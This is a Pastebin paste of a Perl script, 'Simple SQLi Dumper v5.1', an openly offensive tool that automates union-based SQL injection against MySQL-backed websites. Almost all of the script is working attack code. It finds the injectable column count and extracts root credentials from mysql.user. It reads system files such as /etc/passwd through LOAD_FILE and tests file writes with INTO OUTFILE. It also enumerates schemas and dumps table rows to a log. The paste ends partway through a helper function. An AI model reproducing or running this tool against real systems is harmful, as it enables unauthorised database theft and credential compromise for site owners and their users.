SHARE
TWEET

Simple SQLi Dumper v5.1 for MySQL

Googleinurl Jun 21st, 2014 1,809 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2.  
  3. #*******************************************#
  4. #  Simple SQLi Dumper v5.1 for MySQL        #
  5. #  Coded by Vrs-hCk a.k.a c0li.m0de.0n      #
  6. #  E-Mail: ander[at]antisecurity.org        #
  7. #  YM: vrs_hck[at]yahoo.com                 #
  8. #  Blog: http://c0li.blogspot.com           #
  9. #  www.antisecurity.org - www.MainHack.net  #
  10. #*******************************************#
  11.  
  12. use HTTP::Request;
  13. use LWP::UserAgent;
  14. use Getopt::Long;
  15.  
  16. my $datetime = localtime;
  17. my $OS = "$^O";
  18. if ($OS ne 'MSWin32') { system("clear"); }
  19.  
  20. # unhex(hex()) function. 0=disable, 1=enable
  21. $convert = 0;
  22.  
  23. $logo = "c0li";
  24. $end = '--';
  25. $spc = '+';
  26. $field = 123;
  27. $log = 'ssdp.log';
  28.  
  29. print "\n [o]=================================================[x]\n";
  30. print "  |             Simple SQLi Dumper v5.1               |\n";
  31. print "  |                Coded by Vrs-hCk                   |\n";
  32. print " [o]=================================================[o]\n";
  33. print "    Date : $datetime\n";
  34. print "    Help Command: -h, -help, --help\n\n";
  35.  
  36. w_log("\n [o]=================================================[x]\n".
  37.       "  |             Simple SQLi Dumper v5.1               |\n".
  38.       "  |                Coded by Vrs-hCk                   |\n".
  39.       " [o]=================================================[o]\n".
  40.       "    Log Created : $datetime\n".
  41.       "    Help Command: -h, -help, --help\n\n");
  42.  
  43. sub usage {
  44. print "\n";
  45. print "  |-----------------------------------------------------------------------------|\n";
  46. print "  | Usage: perl ssdp.pl [options]                                               |\n";
  47. print "  |                                                                             |\n";
  48. print "  | -u [SQLi URL]       target with id parameter or sqli url with c0li string   |\n";
  49. print "  | -e [sqli end tag]   sql injection end tag (default: \"--\")                   |\n";
  50. print "  | -d [database name]  this option should not be used (default: \@\@database)    |\n";
  51. print "  | -t [table name]     table_name                                              |\n";
  52. print "  | -c [columns name]   column_name (example: id,user,pass,email)               |\n";
  53. print "  | -s [space code]     SPACE code: +,/**/,%20 (default: \"+\")                   |\n";
  54. print "  | -f [max field]      max field to get magic number (default: 123)            |\n";
  55. print "  | -start [num]        row number to begin dumping data                        |\n";
  56. print "  | -stop [num]         row number to stop dumping                              |\n";
  57. print "  | -where [query]      your special dumping query                              |\n";
  58. print "  |                                                                             |\n";
  59. print "  | -log [file name]    file name to save ssdp data (default: ssdp.log)         |\n";
  60. print "  | -p [http proxy]     hostname:port                                           |\n";
  61. print "  |                                                                             |\n";
  62. print "  | -magic              Find Magic Number                           [MySQL v4+] |\n";
  63. print "  | -info               Get MySQL Information                       [MySQL v4+] |\n";
  64. print "  | -dbase              Concat Databases                            [MySQL v5+] |\n";
  65. print "  | -table              Concat Tables                               [MySQL v5+] |\n";
  66. print "  | -column             Concat Columns                              [MySQL v5+] |\n";
  67. print "  | -tabcol             Concat Tables with Columns                  [MySQL v5+] |\n";
  68. print "  | -find               Search Columns Name                         [MySQL v5+] |\n";
  69. print "  | -dump               Dump Data                                   [MySQL v4+] |\n";
  70. print "  | -brute              Fuzzing Tables & Columns                    [MySQL v4+] |\n";
  71. print "  |-----------------------------------------------------------------------------|\n";
  72. print "   Please read ssdp-examples.txt for more info :)\n";
  73. print "\n\n";
  74. }
  75.  
  76. $sqli = '';
  77. $database = '';
  78. $table = '';
  79. $column = '';
  80. $proxy = '';
  81. $start = 0;
  82. $stop = 0;
  83. $where = '';
  84. $proxy = '';
  85.  
  86. GetOptions (
  87.     "u=s" => \$sqli, "e=s" => \$end, "d=s" => \$database, "t=s" => \$table, "c=s" => \$column, "s=s" => \$spc,
  88.     "f=i" => \$field, "start=i" => \$start, "stop=i" => \$stop, "where=s" => \$where, "log=s" => \$log, "p=s" => \$proxy,
  89.     "info" => sub {
  90.                     url_check();
  91.                     print " [+] c0li SQLi URL: http://$sqli\n";
  92.                     print " [+] SQLi End Tag: $end\n";
  93.                     w_log(" [+] c0li SQLi URL: http://$sqli\n");
  94.                     w_log(" [+] SQLi End Tag: $end\n");
  95.                     proxy_test();
  96.                     get_mysqlinfo($sqli);
  97.                     print "\n Done.\n\n";
  98.                     w_log("\n Done.\n\n");
  99.                   },
  100.     "dbase" => sub {
  101.                      url_check();
  102.                      print " [+] c0li SQLi URL: http://$sqli\n";
  103.                      print " [+] SQLi End Tag: $end\n";
  104.                      w_log(" [+] c0li SQLi URL: http://$sqli\n");
  105.                      w_log(" [+] SQLi End Tag: $end\n");
  106.                      proxy_test();
  107.                      get_databases();
  108.                    },
  109.     "table" => sub {
  110.                      url_check();
  111.                      print " [+] c0li SQLi URL: http://$sqli\n";
  112.                      print " [+] SQLi End Tag: $end\n";
  113.                      w_log(" [+] c0li SQLi URL: http://$sqli\n");
  114.                      w_log(" [+] SQLi End Tag: $end\n");
  115.                      proxy_test();
  116.                      get_tables($database);
  117.                    },
  118.     "column" => sub {
  119.                       url_check();
  120.                       if (!$table) { print " [Error] \"-t [table name]\" option is required.\n\n"; exit(); }
  121.                       print " [+] c0li SQLi URL: http://$sqli\n";
  122.                       print " [+] SQLi End Tag: $end\n";
  123.                       w_log(" [+] c0li SQLi URL: http://$sqli\n");
  124.                       w_log(" [+] SQLi End Tag: $end\n");
  125.                       proxy_test();
  126.                       get_columns($database,$table);
  127.                     },
  128.     "tabcol" => sub {
  129.                       url_check();
  130.                       print " [+] c0li SQLi URL: http://$sqli\n";
  131.                       print " [+] SQLi End Tag: $end\n";
  132.                       w_log(" [+] c0li SQLi URL: http://$sqli\n");
  133.                       w_log(" [+] SQLi End Tag: $end\n");
  134.                       proxy_test();
  135.                       get_tables_columns($database);
  136.                     },
  137.     "find" => sub {
  138.                     url_check();
  139.                     if (!$column) { print " [Error] \"-c [column name]\" option is required.\n\n"; exit(); }
  140.                     print " [+] c0li SQLi URL: http://$sqli\n";
  141.                     print " [+] SQLi End Tag: $end\n";
  142.                     w_log(" [+] c0li SQLi URL: http://$sqli\n");
  143.                     w_log(" [+] SQLi End Tag: $end\n");
  144.                     proxy_test();
  145.                     search_columns($database,$column);
  146.                   },
  147.     "magic" => sub {
  148.                      if (!$sqli) { print " [Error] \"-u [URL]\" option is required.\n\n"; exit(); }
  149.                      if ($sqli =~ /http:\/\// ) { $sqli = str_replace($sqli,"http://",""); }
  150.                      print " [+] URL: http://$sqli\n";
  151.                      print " [+] End Tag: $end\n";
  152.                      w_log(" [+] URL: http://$sqli\n");
  153.                      w_log(" [+] End Tag: $end\n");
  154.                      proxy_test();
  155.                      get_magic_number($sqli);
  156.                    },
  157.     "dump" => sub {
  158.                     url_check();
  159.                     if (!$table) { print " [Error] \"-t [table name]\" option is required.\n\n"; exit(); }
  160.                     if (!$column) { print " [Error] \"-c [columns name]\" option is required.\n\n"; exit(); }
  161.                     print " [+] c0li SQLi URL: http://$sqli\n";
  162.                     print " [+] SQLi End Tag: $end\n";
  163.                     w_log(" [+] c0li SQLi URL: http://$sqli\n");
  164.                     w_log(" [+] SQLi End Tag: $end\n");
  165.                     proxy_test();
  166.                     dump_data();
  167.                   },
  168.     "brute" => sub {
  169.                      url_check();
  170.                      print " [+] c0li SQLi URL: http://$sqli\n";
  171.                      print " [+] SQLi End Tag: $end\n";
  172.                      w_log(" [+] c0li SQLi URL: http://$sqli\n");
  173.                      w_log(" [+] SQLi End Tag: $end\n");
  174.                      proxy_test();
  175.                      brute_tabcol();
  176.                    },
  177.     "help|h" => sub { usage(); }
  178. );
  179.  
  180. sub url_check {
  181.     if (!$sqli) { print " [Error] \"-u [URL]\" option is required.\n\n"; exit(); }
  182.     if ($sqli !~ m/c0li/) { print " [Error] SQLi URL must be included \"c0li\" string.\n\n"; exit(); }
  183.     if ($sqli =~ /http:\/\// ) { $sqli = str_replace($sqli,"http://",""); }
  184.     if ($sqli =~ m/ /) { $sqli = str_replace($sqli," ",$spc); }
  185.     $sqli = str_replace($sqli,"%20",$spc);
  186.     $sqli = str_replace($sqli,"\\+",$spc);
  187.     $sqli = str_replace($sqli,"/\\*\\*/",$spc);
  188.     if ($proxy =~ /http:\/\// ) { $proxy = str_replace($proxy,'http://',''); }
  189. }
  190.  
  191. sub proxy_test {
  192.     if ($proxy) {
  193.         syswrite(STDOUT,"\n Checking HTTP Proxy ...",26);
  194.         w_log("\n Checking HTTP Proxy ...");
  195.         my $ua = LWP::UserAgent->new(agent => "Mozilla/5.0");
  196.         $ua->proxy("http", "http://".$proxy."/");
  197.         $ua->timeout(10);
  198.         my $request = HTTP::Request->new(GET => 'http://www.google.com/');
  199.         my $response = $ua->request($request);
  200.         my $content = $response->content();
  201.         if ($content =~ m/<title>Google<\/title>/g) { print " Good :)\n"; w_log(" Good :)\n"); }
  202.         else { print " Failed :(\n\n"; w_log(" Failed :(\n\n"); $proxy = ''; exit(); }
  203.     }
  204. }
  205.  
  206. sub brute_tabcol {
  207.     open(TABLES, 'tables.dict') or die(" Cannot open or read tables.dict !!\n");
  208.     @tables=<TABLES>;
  209.     close(TABLES);
  210.     open(COLUMNS, 'columns.dict') or die(" Cannot open or read columns.dict !!\n");
  211.     @columns=<COLUMNS>;
  212.     close(COLUMNS);
  213.     print "\n Finding Tables & Columns ...\n\n";
  214.     w_log("\n Finding Tables & Columns ...\n\n");
  215.     my $inc = 0;
  216.     while ($tbl = <@tables>) {
  217.         my $concat = '0x21346E64337273306E21';
  218.         my $from = $spc.'FROM'.$spc.$tbl;
  219.         my $tbldata = ssdp_get_data($concat,$from);
  220.         if ($tbldata eq '!4nd3rs0n!') {
  221.             $inc++;
  222.             syswrite(STDOUT," [$inc] $tbl: ",255);
  223.             w_log(" [$inc] $tbl: ");
  224.             while ($col = <@columns>) {
  225.                 my $coldata = ssdp_get_data($concat.','.$col,$from);
  226.                 if ($coldata =~ /!4nd3rs0n!/) {
  227.                     syswrite(STDOUT,$col.',',255);
  228.                     w_log($col.',');
  229.                 }
  230.             } print "\n"; w_log("\n");
  231.         }
  232.     } print "\n Done.\n\n"; w_log("\n Done.\n\n");
  233. }
  234.  
  235. sub get_magic_number {
  236.     my $c0li = '';
  237.     my $c0de = '';
  238.     my $url = $_[0];
  239.     my $union = $spc."AND".$spc."1=2".$spc."UNION".$spc.'ALL'.$spc."SELECT".$spc;
  240.     print "\n Attempting to find the magic number...\n\n";
  241.     w_log("\n Attempting to find the magic number...\n\n");
  242.     syswrite(STDOUT," [+] Testing: ",14);
  243.     w_log(" [+] Testing: ");
  244.     for ($i=1; $i<=$field; $i++){
  245.         my $bin = '4nd3rs0n'.$i.'4nd3rs3n';
  246.         my $hex = $bin;
  247.         $hex =~ s/(.)/sprintf("%x",ord($1))/eg;
  248.                 if (($i > 1) and ($i < $field)) {
  249.                         $c0li = $c0li.",0x".$hex;
  250.                         $c0de = $c0de.",".$bin;
  251.                 } else {
  252.                         $c0li = $c0li."0x".$hex;
  253.                         $c0de = $c0de.$bin;
  254.                 }
  255.         syswrite(STDOUT,$i.",", 255);
  256.         w_log($i.",");
  257.         my $magic = '';
  258.         my $xpl = $url.$union.$c0li.$end;
  259.         my $content = get_content(0,$xpl);
  260.         if (($content =~ m/4nd3rs0n/i) and ($content =~ m/4nd3rs3n/i)) {
  261.             my $number = ssdp_mid_str('4nd3rs0n','4nd3rs3n',$content);
  262.             my $link1 = str_replace($c0de,'4nd3rs0n'.$number.'4nd3rs3n','c0li');
  263.             my $link2 = str_replace($link1,'4nd3rs0n','');
  264.             my $link3 = str_replace($link2,'4nd3rs3n','');
  265.             my $inject = $url.$union.$link3;
  266.             print "\n\n [+] Field Length : $i\n";
  267.             w_log("\n\n [+] Field Length : $i\n");
  268.             print " [+] Magic Number : ";
  269.             w_log(" [+] Magic Number : ");
  270.             for ($x=1; $x<=$i; $x++) { if ($content =~ /4nd3rs0n[$x]4nd3rs3n/i) { print $x.','; w_log($x.','); }}
  271.             print "\n [+] URL Injection: http://$inject\n";
  272.             w_log("\n [+] URL Injection: http://$inject\n");
  273.             $sqli = $inject;
  274.             get_mysqlinfo($inject);
  275.             last();
  276.         }
  277.         if ($i == $field) {
  278.             print "\n\n Failed to get magic number. Please try it manually :)\n\n";
  279.             w_log("\n\n Failed to get magic number. Please try it manually :)\n\n");
  280.             exit();
  281.         }
  282.     }
  283.     print "\n Done.\n\n";
  284.     w_log("\n Done.\n\n");
  285. }
  286.  
  287. sub get_mysqlinfo {
  288.     my $url = $_[0];
  289.     $load_file = '2F6574632F706173737764';
  290.     $load_res = "root:(.+):(.+):(.+):(.+):(.+):(.+)";
  291.     $test_file = '/tmp/c0li-'.(int rand(666)).'.txt';
  292.     $read_file = $test_file;
  293.     $read_file =~ s/(.)/sprintf("%x",ord($1))/eg;
  294.     my $ver_concat = 'CONCAT_WS(0x3a,0x2163306C69,database(),user(),version(),@@version_compile_os,0x63306C6921)';
  295.     if ($convert) { $ver_concat = 'UNHEX(HEX(CONCAT_WS(0x3a,0x2163306C69,database(),user(),@@version,@@version_compile_os,0x63306C6921)))'; }
  296.     my $ver_select = str_replace($url,'c0li',$ver_concat);
  297.     print "\n Showing MySQL Information ...\n\n";
  298.     w_log("\n Showing MySQL Information ...\n\n");
  299.     my $ver_content = get_content(0,$ver_select.$end);
  300.     if ($ver_content =~ /!c0li:(.+?):(.+?):(.+?):(.+?):c0li!/i) {
  301.         my ($db_name,$usr,$ver,$os) = ($1,$2,$3,$4);
  302.         print " [+] Database: $db_name\n";
  303.         print " [+] User: $usr\n";
  304.         print " [+] Version: $ver\n";
  305.         print " [+] System: $os\n";
  306.         w_log(" [+] Database: $db_name\n");
  307.         w_log(" [+] User: $usr\n");
  308.         w_log(" [+] Version: $ver\n");
  309.         w_log(" [+] System: $os\n");
  310.         if (($os =~ /nt/i) or ($os =~ /win/i)) {
  311.             $load_file = '633A2F626F6F742E696E69';
  312.             $load_res = 'Boot Loader';
  313.             $test_file = '/c0li-'.(int rand(666)).'.txt';
  314.             $read_file = $test_file;
  315.             $read_file =~ s/(.)/sprintf("%x",ord($1))/eg;
  316.         }
  317.         my $acc_concat = 'CONCAT_WS(0x3a,0x2163306C69,Host,User,Password,0x63306C6921)';
  318.         if ($convert) { $acc_concat = 'UNHEX(HEX(CONCAT_WS(0x3a,0x2163306C69,Host,User,Password,0x63306C6921)))'; }
  319.         my $acc_select = str_replace($url,'c0li',$acc_concat);
  320.         my $acc_content = get_content(0,$acc_select.$spc.'FROM'.$spc.'mysql.user'.$spc.'where'.$spc.'user=0x726F6F74'.$end);
  321.         if ($acc_content =~ /!c0li:(.+?):(.+?):(.+?):c0li!/i) {
  322.             print " [+] Access to \"mysql\" Database: Yes (w00t)\n";
  323.             print "     [-] Host: $1\n";
  324.             print "     [-] User: $2\n";
  325.             print "     [-] Pass: $3\n";
  326.             w_log(" [+] Access to \"mysql\" Database: Yes (w00t)\n");
  327.             w_log("     [-] Host: $1\n");
  328.             w_log("     [-] User: $2\n");
  329.             w_log("     [-] Pass: $3\n");
  330.         } else { print " [+] Access to \"mysql\" Database: No\n"; w_log(" [+] Access to \"mysql\" Database: No\n"); }
  331.         my $file_concat = 'LOAD_FILE(0x'.$load_file.')';
  332.         my $file_select = str_replace($url,'c0li',$file_concat);
  333.         my $file_content = get_content(0,$file_select.$end);
  334.         if ($file_content =~ /$load_res/i) {
  335.             $load_file =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
  336.             print " [+] Read File \"$load_file\": Yes (w00t)\n";
  337.             w_log(" [+] Read File \"$load_file\": Yes (w00t)\n");
  338.             my $create_concat = '0x63306C692E6D3064652E306E';
  339.             my $create_select = str_replace($url,'c0li',$create_concat);
  340.             my $create_query = $spc.'INTO'.$spc.'OUTFILE'.$spc.'"'.$test_file.'"';
  341.             $undefine = get_content(0,$create_select.$create_query.$end); $undefine = '';
  342.             my $read_concat = 'LOAD_FILE(0x'.$read_file.')';
  343.             my $read_select = str_replace($url,'c0li',$read_concat);
  344.             my $file_content = get_content(0,$read_select.$end);
  345.             if ($file_content =~ /c0li.m0de.0n/i) { print " [+] Create File \"$test_file\": Yes (w00t)\n";
  346.             w_log(" [+] Create File \"$test_file\" : Yes (w00t)\n"); }
  347.             else { print " [+] Create File \"$test_file\": No\n"; w_log(" [+] Create File \"$test_file\": No\n"); }
  348.         }
  349.         else { $load_file =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
  350.             print " [+] Read File \"$load_file\": No\n";
  351.             w_log(" [+] Read File \"$load_file\": No\n");
  352.         }
  353.     }
  354.     else {
  355.         print " Failed to get MySQL Information.\n";
  356.         w_log(" Failed to get MySQL Information.\n");
  357.     }
  358. }
  359.  
  360. sub get_databases {
  361.     my $schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.SCHEMATA'.$spc.'WHERE'.$spc.
  362.     'SCHEMA_NAME'.$spc.'NOT'.$spc.'IN'.$spc.'(0x696E666F726D6174696F6E5F736368656D61)';
  363.     my $count = ssdp_get_data('COUNT(*)',$schema);
  364.     print "\n Showing databases ...\n\n";
  365.     w_log("\n Showing databases ...\n\n");
  366.     syswrite(STDOUT, " [+] DATABASES($count): ", 255);
  367.     w_log(" [+] DATABASES($count): ");
  368.     for ($i=0; $i<$count; $i++) {
  369.         my $inc = ($i+1);
  370.         my $query = $schema.$spc.'LIMIT'.$spc.$i.',1';
  371.         my $db_name = ssdp_get_data('SCHEMA_NAME',$query);
  372.         if (($inc>0) and ($inc<$count)) { $db_name = $db_name.','; }
  373.         syswrite(STDOUT,$db_name,255);
  374.         w_log($db_name);
  375.     }
  376.     print "\n\n Done.\n\n";
  377.     w_log("\n\n Done.\n\n");
  378. }
  379.  
  380. sub get_tables {
  381.     my $dbhex = $_[0];
  382.     $dbhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  383.     my $tbl_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.TABLES'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.$dbhex;
  384.     if (!$database) { $tbl_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.TABLES'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=database()';
  385.     print " [+] Database Name: database()\n"; w_log(" [+] Database Name: database()\n")}
  386.     else { print " [+] Database Name: $database\n"; w_log(" [+] Database Name: $database\n");}
  387.     my $tbl_count = ssdp_get_data('COUNT(*)',$tbl_schema);
  388.     print " [+] Number of Tables: $tbl_count\n\n";
  389.     print " Showing tables ...\n\n";
  390.     w_log(" [+] Number of Tables: $tbl_count\n\n");
  391.     w_log(" Showing tables ...\n\n");
  392.     for ($i=0; $i<$tbl_count; $i++) {
  393.         my $inc = ($i+1);
  394.         my $query = $tbl_schema.$spc.'LIMIT'.$spc.$i.',1';
  395.         my $tbl_name = ssdp_get_data('TABLE_NAME',$query);
  396.         my $data_schema = $spc.'FROM'.$spc.$database.'.'.$tbl_name;
  397.         if (!$database) { $data_schema = $spc.'FROM'.$spc.$tbl_name; }
  398.         my $data_count = ssdp_get_data('COUNT(*)',$data_schema);
  399.         syswrite(STDOUT," [".$inc."] ".$tbl_name."($data_count)\n", 255);
  400.         w_log(" [".$inc."] ".$tbl_name."($data_count)\n");
  401.     }
  402.     print "\n Done.\n\n";
  403.     w_log("\n Done.\n\n");
  404. }
  405.  
  406. sub get_columns {
  407.     my $dbhex = $_[0];
  408.     $dbhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  409.     my $tblhex = $_[1];
  410.     $tblhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  411.     my $col_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.
  412.     $dbhex.$spc.'AND'.$spc.'TABLE_NAME=0x'.$tblhex;
  413.     if (!$database) { $col_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA='.
  414.     'database()'.$spc.'AND'.$spc.'TABLE_NAME=0x'.$tblhex;
  415.     print " [+] Database Name: database()\n"; w_log(" [+] Database Name: database()\n"); }
  416.     else { print " [+] Database Name: $database\n";    w_log(" [+] Database Name: $database\n"); }
  417.     my $col_count = ssdp_get_data("COUNT(*)",$col_schema);
  418.     my $data_schema = $spc.'FROM'.$spc.$database.'.'.$table;
  419.     if (!$database) { $data_schema = $spc.'FROM'.$spc.$table; }
  420.     my $data_count = ssdp_get_data('COUNT(*)',$data_schema);
  421.     print " [+] Table Name: $table\n";
  422.     print " [+] Number of Columns: $col_count\n\n";
  423.     print " Showing columns from table \"$table\" ...\n\n";
  424.     w_log(" [+] Table Name: $table\n");
  425.     w_log(" [+] Number of Columns: $col_count\n\n");
  426.     w_log(" Showing columns from table \"$table\" ...\n\n");
  427.     syswrite(STDOUT, " [+] ".$table."\($data_count\): ", 255);
  428.     for ($i=0; $i<$col_count; $i++) {
  429.         my $inc = ($i+1);
  430.         my $query = $col_schema.$spc.'LIMIT'.$spc.$i.',1';
  431.         my $col_name = ssdp_get_data('COLUMN_NAME',$query);
  432.         if (($inc>0) and ($inc<$col_count)) { $col_name = $col_name.','; }
  433.         syswrite(STDOUT,$col_name,255);
  434.         w_log($col_name);
  435.     }
  436.     print "\n\n Done.\n\n";
  437.     w_log("\n\n Done.\n\n");
  438. }
  439.  
  440. sub get_tables_columns {
  441.     my $dbhex = $_[0];
  442.     $dbhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  443.     my $tbl_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.TABLES'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.$dbhex;
  444.     if (!$database) { $tbl_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.TABLES'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=database()';
  445.     print " [+] Database Name: database()\n"; w_log(" [+] Database Name: database()\n"); }
  446.     else { print " [+] Database Name: $database\n";    w_log(" [+] Database Name: $database\n"); }
  447.     my $tbl_count = ssdp_get_data('COUNT(*)',$tbl_schema);
  448.     print " [+] Number of Tables: $tbl_count\n";
  449.     print "\n Showing Tables & Columns ...\n\n";
  450.     w_log(" [+] Number of Tables: $tbl_count\n");
  451.     w_log("\n Showing Tables & Columns ...\n\n");
  452.     for ($i=0; $i<$tbl_count; $i++) {
  453.         my $tbl_inc = ($i+1);
  454.         my $tbl_query = $tbl_schema.$spc.'LIMIT'.$spc.$i.',1';
  455.         my $tbl_name = ssdp_get_data('TABLE_NAME',$tbl_query);
  456.         my $data_schema = $spc.'FROM'.$spc.$database.'.'.$tbl_name;
  457.         if (!$database) { $data_schema = $spc.'FROM'.$spc.$tbl_name; }
  458.         my $data_count = ssdp_get_data('COUNT(*)',$data_schema);
  459.         syswrite(STDOUT," [$tbl_inc] ".$tbl_name."($data_count): ", 255);
  460.         w_log(" [$tbl_inc] ".$tbl_name."($data_count): ");
  461.         my $tblhex = $tbl_name;
  462.         $tblhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  463.         my $col_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.
  464.         $dbhex.$spc.'AND'.$spc.'TABLE_NAME=0x'.$tblhex;
  465.         if (!$database) { $col_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA='.
  466.         'database()'.$spc.'AND'.$spc.'TABLE_NAME=0x'.$tblhex; }
  467.         my $col_count = ssdp_get_data('COUNT(*)',$col_schema);
  468.         for ($x=0; $x<$col_count; $x++) {
  469.             my $col_inc = ($x+1);
  470.             my $col_query = $col_schema.$spc.'LIMIT'.$spc.$x.',1';
  471.             my $col_name = ssdp_get_data('COLUMN_NAME',$col_query);
  472.             if (($col_inc>0) and ($col_inc<$col_count)) { $col_name = $col_name.','; }
  473.             syswrite(STDOUT,$col_name,255);
  474.             w_log($col_name);
  475.         }
  476.         print "\n"; w_log("\n");
  477.     }
  478.     print "\n Done.\n\n"; w_log("\n Done.\n\n");
  479. }
  480.  
  481. sub dump_data {
  482.     my $concat = 'CONCAT_WS(0x203A20,'.$column.')';
  483.     my $data_schema = $spc.'FROM'.$spc.$database.'.'.$table;
  484.     if (!$database) { $data_schema = $spc.'FROM'.$spc.$table; print "\n [+] Database Name: database()\n"; }
  485.     else { print "\n [+] Database Name: $database\n"; }
  486.     my $data_count = ssdp_get_data('COUNT(*)',$data_schema);
  487.     if (!$data_count) { print " Failed to get data count.\n\n Halted.\n\n";
  488.     w_log(" Failed to get data count.\n\n Halted.\n\n"); exit(); };
  489.     if ($data_count == 0) { print " No data. Operation halted.\n\n";
  490.     w_log(" No data. Operation halted.\n\n"); exit(); };
  491.     print " [+] Table Name: $table\n";
  492.     print " [+] Column Name: $column\n";
  493.     print " [+] Data Count: $data_count\n";
  494.     w_log(" [+] Table Name: $table\n");
  495.     w_log(" [+] Column Name: $column\n");
  496.     w_log(" [+] Data Count: $data_count\n");
  497.     if ($where ne '') {
  498.         print "\n Special Dump Query: WHERE $where\n";
  499.         w_log("\n Special Dump Query: WHERE $where\n");
  500.         $where = str_replace($where,' ',$spc);
  501.         my $where_count = ssdp_get_data('COUNT(*)',$data_schema.$spc.'WHERE'.$spc.$where);
  502.         print "\n Dumping $where_count Data ...\n\n";
  503.         w_log("\n Dumping $where_count Data ...\n\n");
  504.         for ($x=0; $x<=$where_count-1; $x++) {
  505.             my $inc = ($x+1);
  506.             my $where_query = $data_schema.$spc.'WHERE'.$spc.$where.$spc.'LIMIT'.$spc.$x.',1';
  507.             my $dumping = ssdp_get_data($concat,$where_query);
  508.             if ($dumping eq '') { print " [$inc] No data. Operation halted.\n\n";
  509.             w_log(" [$inc] No data. Operation halted.\n\n"); exit(); }
  510.             open(LOG,">>$log") || die(" [$logo] Cannot open file.\n");
  511.             print LOG "$dumping\n";
  512.             close(LOG);
  513.             print " [$inc] $dumping\n";
  514.         }
  515.         print "\n Done.\n\n";
  516.         w_log("\n Done.\n\n");
  517.     }
  518.     else {
  519.         print "\n Dumping Data ...\n\n";
  520.         w_log("\n Dumping Data ...\n\n");
  521.         if ($start == 0 and $stop == 0) { $start = 0; $stop = $data_count -1; }
  522.         for ($i=$start; $i<=$stop; $i++) {
  523.             my $inc = ($i+1);
  524.             my $query = $data_schema.$spc.'LIMIT'.$spc.$i.',1';
  525.             my $dumping = ssdp_get_data($concat,$query);
  526.             if ($dumping eq '') { $dumping = '<no data>'; }
  527.             open(LOG,">>$log") || die(" [$logo] Cannot open file.\n");
  528.             print LOG "$dumping\n";
  529.             close(LOG);
  530.             print " [$inc] $dumping\n";
  531.         }
  532.         print "\n Done.\n\n";
  533.         w_log("\n Done.\n\n");
  534.     }
  535. }
  536.  
  537. sub search_columns {
  538.     my $dbhex = $_[0];
  539.     $dbhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  540.     my $colhex = $_[1];
  541.     $colhex =~ s/(.)/sprintf("%x",ord($1))/eg;
  542.     my $concat = 'TABLE_SCHEMA,0x2e,TABLE_NAME,0x2e,COLUMN_NAME';
  543.     my $schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.
  544.     $dbhex.$spc.'AND'.$spc.'COLUMN_NAME'.$spc.'LIKE'.$spc.'(0x25'.$colhex.'25)';
  545.     if (!$database) { $schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA='.
  546.     'database()'.$spc.'AND'.$spc.'COLUMN_NAME'.$spc.'LIKE'.$spc.'(0x25'.$colhex.'25)';
  547.     print " [+] Database Name: database()\n"; w_log(" [+] Database Name: database()\n"); }
  548.     else { print " [+] Database Name: $database\n"; w_log(" [+] Database Name: $database\n"); }
  549.     print "\n Searching for Columns Name like *$column* ...\n\n";
  550.     print " [+] Columns Found: \n\n";
  551.     w_log("\n Searching for Columns Name like *$column* ...\n\n");
  552.     w_log(" [+] Columns Found: \n\n");
  553.     my $status = 1;
  554.     my $i = 0;
  555.     while ($status == 1) {
  556.         my $inc = ($i+1);
  557.         my $col_query = $schema.$spc.'LIMIT'.$spc.$i.',1';
  558.         my $result = ssdp_get_data($concat,$col_query);
  559.         if (($result eq '') and ($i == 0)) { print " [$inc] No data. Operation halted.\n\n Done.\n\n";
  560.         w_log(" [$inc] No data. Operation halted.\n\n Done.\n\n"); exit(); }
  561.         elsif ($result eq '') { print "\n Done.\n\n"; w_log("\n Done.\n\n"); exit(); }
  562.         print " [$inc] $result\n";
  563.         w_log(" [$inc] $result\n");
  564.         $i++;
  565.     }
  566. }
  567.  
  568. sub ssdp_get_data {
  569.     my $select = $_[0];
  570.     my $filter = $_[1];
  571.     my $data = '';
  572.     my $concat = 'CONCAT(0x63306C6923,'.$select.',0x2363306C69)';
  573.     if ($convert) { $concat = 'UNHEX(HEX(CONCAT(0x63306C6923,'.$select.',0x2363306C69)))'; }
  574.     my $query = str_replace($sqli,'c0li',$concat);
  575.     my $content = get_content(0,$query.$filter.$end);
  576.     if ($content =~ /c0li/i) { $data = ssdp_mid_str('c0li#','#c0li',$content); }
  577.     if ($data eq '') { return ''; }
  578.     return $data;
  579. }
  580.  
  581. sub ssdp_mid_str {
  582.     my $left = $_[0];
  583.     my $right = $_[1];
  584.     my $string = $_[2];
  585.     my @exp = split($left,$string);
  586.     my @data = split($right,$exp[1]);
  587.     return $data[0];
  588. }
  589.  
  590. sub str_replace {
  591.     my $source  = shift;
  592.     my $search  = shift;
  593.     my $replace = shift;
  594.     $source =~ s/$search/$replace/ge;
  595.     return $source;
